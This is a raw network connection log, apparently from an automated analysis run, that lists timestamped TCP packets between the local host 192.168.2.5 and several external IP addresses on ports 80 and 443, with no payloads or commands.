Oct 8, 2024 20:47:40.672472954 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672482967 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672514915 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672517061 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672533989 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672549963 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672571898 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672581911 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672610044 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672616005 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672647953 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672671080 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672688961 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672717094 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672749043 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672782898 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672784090 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672804117 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672816038 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672847986 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672872066 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672883034 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672895908 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672916889 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672935963 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672949076 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672972918 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672981977 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.673001051 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.673037052 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.673047066 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.673079014 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.673105001 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.673114061 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.673127890 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.673146963 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.673166990 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.673181057 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.673202991 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.673213959 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.673235893 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.673268080 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.712140083 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.712171078 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.712224007 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.712224007 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.712224007 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.712259054 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.712291002 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.712315083 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.712323904 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.712337971 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.712357998 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.712378979 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.712390900 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.712421894 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.712444067 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.753509045 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.753587008 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.753618002 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.753635883 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.753638983 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.753671885 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.753685951 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.753705025 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.753720045 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.753739119 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.753752947 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.753787994 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.753793955 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.753864050 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.753889084 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.753896952 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.753921032 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.753936052 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.753951073 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.753968000 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.753983021 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.753999949 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.754009962 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.754033089 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.754067898 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.754069090 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.754077911 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.754115105 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.757345915 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.757400036 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.757410049 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.757433891 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.757451057 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.757487059 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.757514000 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.757546902 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.757577896 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.757580996 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.757599115 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.757616997 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.757633924 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.757654905 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.757669926 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.757687092 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.757709980 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.757719994 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.757746935 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.757754087 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.757770061 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.757808924 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.757865906 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.757898092 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.757931948 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.757946968 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.757986069 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.762895107 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.762928009 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.762959003 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.762979031 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.762979031 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.763012886 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.763032913 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.763067007 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.763070107 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.763099909 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.763118029 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.763135910 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.763154030 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.763166904 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.763189077 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.763200045 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.763219118 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.763254881 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.930329084 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:40.935332060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:41.082613945 CEST	443	49881	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.089668036 CEST	49881	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.089711905 CEST	443	49881	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.090065956 CEST	49881	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.090080976 CEST	443	49881	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.169688940 CEST	49886	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:41.169734955 CEST	443	49886	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:41.169816971 CEST	49886	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:41.187838078 CEST	443	49881	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.187860012 CEST	443	49881	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.187938929 CEST	49881	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.187980890 CEST	443	49881	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.188146114 CEST	443	49881	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.188205004 CEST	49881	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.190948009 CEST	49886	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:41.190967083 CEST	443	49886	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:41.193129063 CEST	49881	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.193130016 CEST	49881	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.193176985 CEST	443	49881	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.193201065 CEST	443	49881	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.224719048 CEST	443	49882	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.231921911 CEST	49887	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.231947899 CEST	443	49887	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.232024908 CEST	49887	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.234194040 CEST	49882	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.234252930 CEST	443	49882	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.235115051 CEST	49882	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.235132933 CEST	443	49882	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.235198975 CEST	49887	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.235214949 CEST	443	49887	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.250819921 CEST	443	49884	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.253118038 CEST	443	49883	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.258646011 CEST	49884	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.258663893 CEST	443	49884	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.259134054 CEST	49884	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.259140968 CEST	443	49884	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.259155035 CEST	49883	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.259196997 CEST	443	49883	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.259819984 CEST	49883	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.259833097 CEST	443	49883	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.274589062 CEST	443	49885	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.286338091 CEST	49885	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.286362886 CEST	443	49885	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.286699057 CEST	49885	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.286706924 CEST	443	49885	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.335448980 CEST	443	49882	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.335606098 CEST	443	49882	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.335710049 CEST	443	49882	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.335788965 CEST	49882	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.356040955 CEST	443	49884	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.356148958 CEST	443	49884	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.356199980 CEST	49884	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.356264114 CEST	443	49883	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.356913090 CEST	443	49883	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.356991053 CEST	49883	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.357017040 CEST	443	49883	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.357047081 CEST	443	49883	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.357105017 CEST	49883	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.388391972 CEST	49882	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.388392925 CEST	49882	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.388444901 CEST	443	49882	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.388469934 CEST	443	49882	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.391825914 CEST	443	49885	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.391855001 CEST	443	49885	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.391889095 CEST	443	49885	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.391933918 CEST	49885	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.391988039 CEST	49885	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.400108099 CEST	49885	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.400136948 CEST	443	49885	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.414290905 CEST	49883	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.414290905 CEST	49883	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.414347887 CEST	443	49883	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.414374113 CEST	443	49883	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.416062117 CEST	49884	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.416101933 CEST	443	49884	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.416121960 CEST	49884	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.416129112 CEST	443	49884	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.610872984 CEST	49888	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.610913992 CEST	443	49888	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.611021042 CEST	49888	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.681324959 CEST	49888	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.681345940 CEST	443	49888	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.774322987 CEST	49889	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.774355888 CEST	443	49889	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.774430990 CEST	49889	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.775896072 CEST	49890	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.775906086 CEST	443	49890	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.776016951 CEST	49890	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.820693970 CEST	49889	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.820728064 CEST	443	49889	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.821574926 CEST	49890	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:41.821589947 CEST	443	49890	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:41.855112076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:41.855432987 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:41.870747089 CEST	443	49886	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:41.870839119 CEST	49886	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:42.012419939 CEST	49891	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:42.012459993 CEST	443	49891	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:42.012537956 CEST	49891	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:42.057271957 CEST	49886	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:42.057300091 CEST	443	49886	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:42.058278084 CEST	443	49886	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:42.061744928 CEST	49891	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:42.061760902 CEST	443	49891	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:42.078835964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:42.107786894 CEST	49886	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:42.118227005 CEST	49886	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:42.118227005 CEST	49886	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:42.118495941 CEST	443	49886	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:42.231462955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:42.231520891 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:42.389008999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:42.469727039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:42.469785929 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:42.474150896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:42.474725962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:42.662549973 CEST	443	49887	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:42.663202047 CEST	49887	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:42.663214922 CEST	443	49887	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:42.663567066 CEST	49887	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:42.663573027 CEST	443	49887	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:42.927352905 CEST	443	49887	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:42.927434921 CEST	443	49887	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:42.927614927 CEST	49887	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:42.927733898 CEST	49887	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:42.927733898 CEST	49887	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:42.927752972 CEST	443	49887	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:42.927769899 CEST	443	49887	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:42.930413008 CEST	49893	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:42.930480003 CEST	443	49893	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:42.930567026 CEST	49893	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:42.930731058 CEST	49893	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:42.930764914 CEST	443	49893	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:42.995557070 CEST	443	49886	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:42.996032000 CEST	443	49886	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:42.996145964 CEST	49886	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:42.996812105 CEST	49886	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:42.996812105 CEST	49886	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:42.996825933 CEST	443	49886	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:42.996834040 CEST	443	49886	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:43.016942978 CEST	49894	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:43.016992092 CEST	443	49894	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:43.017079115 CEST	49894	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:43.017348051 CEST	49894	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:43.017370939 CEST	443	49894	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:43.105360985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:43.105458021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:43.119148970 CEST	443	49889	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.120131016 CEST	49889	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.120131016 CEST	49889	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.120208979 CEST	443	49889	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.120239019 CEST	443	49889	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.123050928 CEST	443	49888	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.123372078 CEST	49888	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.123397112 CEST	443	49888	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.123831034 CEST	443	49890	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.124053955 CEST	49888	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.124059916 CEST	443	49888	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.124212027 CEST	49890	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.124248028 CEST	443	49890	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.124711037 CEST	49890	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.124727011 CEST	443	49890	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.149410009 CEST	443	49891	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.150779963 CEST	49891	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.150800943 CEST	443	49891	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.151199102 CEST	49891	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.151206970 CEST	443	49891	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.220014095 CEST	443	49889	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.220206976 CEST	443	49889	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.220247984 CEST	443	49889	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.220315933 CEST	49889	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.220381975 CEST	49889	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.220630884 CEST	49889	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.220676899 CEST	443	49889	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.220706940 CEST	49889	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.220741987 CEST	443	49889	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.223555088 CEST	443	49890	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.223783970 CEST	443	49890	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.223798037 CEST	49895	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.223856926 CEST	49890	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.223871946 CEST	443	49895	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.223949909 CEST	443	49890	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.223979950 CEST	49895	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.224020958 CEST	49890	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.224132061 CEST	49890	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.224153996 CEST	443	49890	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.224179983 CEST	49890	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.224194050 CEST	443	49890	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.224440098 CEST	443	49888	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.224482059 CEST	443	49888	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.224595070 CEST	443	49888	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.224622965 CEST	49888	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.225627899 CEST	49895	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.225661993 CEST	443	49895	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.225799084 CEST	49888	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.225799084 CEST	49888	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.225799084 CEST	49888	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.227838039 CEST	49896	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.227925062 CEST	443	49896	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.228106022 CEST	49897	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.228157997 CEST	49896	443	192.168.2.5	13.107.246.60
